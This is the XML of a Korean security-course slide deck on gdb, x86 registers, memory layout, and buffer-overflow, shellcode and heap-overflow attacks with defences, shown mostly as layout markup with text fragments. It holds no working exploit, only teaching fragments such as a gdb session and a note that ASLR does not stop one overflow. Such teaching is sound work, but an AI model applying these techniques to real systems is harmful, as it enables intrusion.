            <a:ext cx="3977321" cy="6588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01A300-EBE6-4B42-B0BD-D37242AA4775}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6317137" y="498209"/>
          <a:ext cx="4932807" cy="439337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60444018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04514"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="39292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ASLR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활성화로는 대응이 되지 않는다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이유는 다음과 같이 두 버퍼들 간의 거리는 일정하게 유지되기 때문이다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11618"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="61441" name="_x563165400">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC678E34-4942-49FE-B9D0-0104EB14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81" y="1252979"/>
            <a:ext cx="3870325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AEABC-BB50-468C-9324-155014192660}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183086" y="5146484"/>
            <a:ext cx="5616792" cy="13425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  </a:t>
            </a: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41548C-2860-4A58-B397-1C2FB1EBFC2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8D29BBC-7933-42AE-8CC8-7D28590F626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184F27-96AC-440B-9D1A-6ECD1FEA5C8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7A543647-2FBE-4C63-8D1D-36F3603F92C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6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06A785F-3827-4F15-8E20-629BE1C1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95" y="1690688"/>
            <a:ext cx="5321187" cy="396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B8CDBE8-9EEE-46C3-9DA3-704751E9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19" y="1676655"/>
            <a:ext cx="5769213" cy="43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3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F7B2141-F865-4F5C-9BD5-31D15E87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6" y="1676655"/>
            <a:ext cx="5515876" cy="411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E2D9F07-11BD-46B8-B88E-7E252BF7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97" y="1676655"/>
            <a:ext cx="5712734" cy="426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3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98F93CF-81E5-494D-8043-F353848B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666304"/>
            <a:ext cx="5726611" cy="42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2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&amp;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메모리 구조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38C2BF-E737-4CF1-9271-B620FB4F62E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="838199" y="1921912"/>
            <a:ext cx="5109376" cy="1485791"/>
            <a:chOff x="1196835" y="1885839"/>
            <a:chExt cx="3919993" cy="463445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80E4D0E-B0D4-4619-B7C3-E19AF3D0CE1B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8F76FC-A020-45B8-8C27-58D8CFE89112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63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</a:t>
              </a:r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 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 ]# cd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touch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test_code.c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vi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test_code.c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6C0D68-184D-4013-BBB5-35AD80683AED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6244427" y="1921912"/>
            <a:ext cx="5109376" cy="3144707"/>
            <a:chOff x="1196835" y="1885839"/>
            <a:chExt cx="3919993" cy="618733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2D3B273-6C48-4667-8109-771C5D2CC3B8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8238E7-2E67-427E-8C5D-087E95A28A50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6187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gcc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–o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test_code.c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rgbClr val="00B050"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>test_code</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="00B050"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>test_code.c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./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123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0x11dc010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gdb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./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gdb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) set disassembly-flavor intel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gdb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disas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main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B78BE11-CD1A-4935-943F-FE3C672F9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0" b="32424"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6244427" y="5229340"/>
            <a:ext cx="5403978" cy="10672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9B010F1-3A2A-4AC1-9E0A-DD6FC1CD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84" y="3338497"/>
            <a:ext cx="3216212" cy="29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FFCE75E-B13B-4D5F-9953-EF24EBE0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63" y="4398042"/>
            <a:ext cx="3407245" cy="21154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&amp;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메모리 구조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2E4275-ED97-4E73-8D3F-3A6E04DCD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87" y="1838265"/>
            <a:ext cx="39147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BBBF2EF-017B-4F30-B3BF-CC90D53C5E31}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2826386" y="3788318"/>
            <a:ext cx="156341" cy="596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5CED58A-1EC0-436F-9D11-37DDFA71CE16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="12550818">
            <a:off x="4676782" y="2616803"/>
            <a:ext cx="196666" cy="2060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6E4B1-61FA-431E-AD92-BC4F511F96B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1373785" y="387853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compile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978D9-A765-43CD-9E1E-5975625C5A45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9536329" y="5603705"/>
            <a:ext cx="735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b[20]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B40FA0-7C7E-403F-BBB6-EC1D45CC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948" y="1780907"/>
            <a:ext cx="2078766" cy="19119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B477217-15EE-4902-869D-049CBACCAE54}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9536329" y="4070060"/>
            <a:ext cx="735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413065-392F-4C07-8928-092718753163}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9536329" y="3277864"/>
            <a:ext cx="735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87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범용 레지스터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8B8D674E-A205-4EA5-B390-E71BBA9D9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67" b="44132"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="755903" y="3497816"/>
            <a:ext cx="4611625" cy="12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내용 개체 틀 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BBD847FB-5DFD-4C06-A9F5-9E954FDE39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9767" y="2139696"/>
          <a:ext cx="5680546" cy="3749040"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="815937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077728472"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3980689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</a:tblGrid>
              <a:tr h="326902"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범용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레지스터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EAX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산술 연산 및 논리 연산 수행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EBX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메모리 주소 저장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611002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="510751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ECX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반복문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 사용 시 반복 카운터로 사용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반복할 횟수 지정하고 반복 작업 수행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766126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EDX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EAX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레지스터와 같이 쓰임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부호 확장 명령 등에 사용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큰 수의 곱셈 또는 나눗셈 연산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EDI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복사할 때 목적지 주소 저장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ESI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데이터를 조작하거나 복사할 때 데이터의 주소 저장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ESP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메모리 스택의 끝 지점 주소 포인터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2555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EBP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메모리 스택의 첫 시작 주소 포인터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18716"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="510751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EIP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</a:b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다음에 실행해야 할 명령어의 주소 포인터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1925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23A64-ACB8-4426-B10D-EF30114C7CC5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="517284" y="2332714"/>
            <a:ext cx="5113220" cy="794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범용 레지스터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레지스터들 중에서 각각 특별한 용도가 정해져 있는 레지스터</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20475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2577</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>와이드스크린</PresentationFormat>
  <Paragraphs>757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함초롬바탕</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Noto Sans</vt:lpstr>
      <vt:lpstr>Office 테마</vt:lpstr>
      <vt:lpstr>정보보호</vt:lpstr>
      <vt:lpstr>/Theory/T18   gdb 사용법</vt:lpstr>
      <vt:lpstr>/Theory/T18   gdb 사용법</vt:lpstr>
      <vt:lpstr>/Theory/T18   gdb 사용법</vt:lpstr>
      <vt:lpstr>/Theory/T18   gdb 사용법</vt:lpstr>
      <vt:lpstr>/Theory/T18   gdb 사용법</vt:lpstr>
      <vt:lpstr>/Theory/T19   어셈블리어 &amp; 메모리 구조</vt:lpstr>
      <vt:lpstr>/Theory/T19   어셈블리어 &amp; 메모리 구조</vt:lpstr>
      <vt:lpstr>/Theory/T19   어셈블리어 – 범용 레지스터</vt:lpstr>
      <vt:lpstr>/Theory/T19   어셈블리어 – 범용 레지스터</vt:lpstr>
      <vt:lpstr>/Theory/T19   어셈블리어 – 범용 레지스터</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/8  8. Buffer Overflow 공격 및 방어</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/8  8. Buffer Overflow 공격 및 방어 -대응</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/9  9. BOF - 쉘코드 실행</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/9  9. BOF - 쉘코드 실행 -대응</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/10  10. BOF - 힙</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/10  10. BOF – 힙 -대응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arizona95</dc:creator>
  <cp:lastModifiedBy>백 도우</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-05-01T05:59:10Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-02-13T02:08:56Z</dcterms:modified>
</cp:coreProperties>
</file>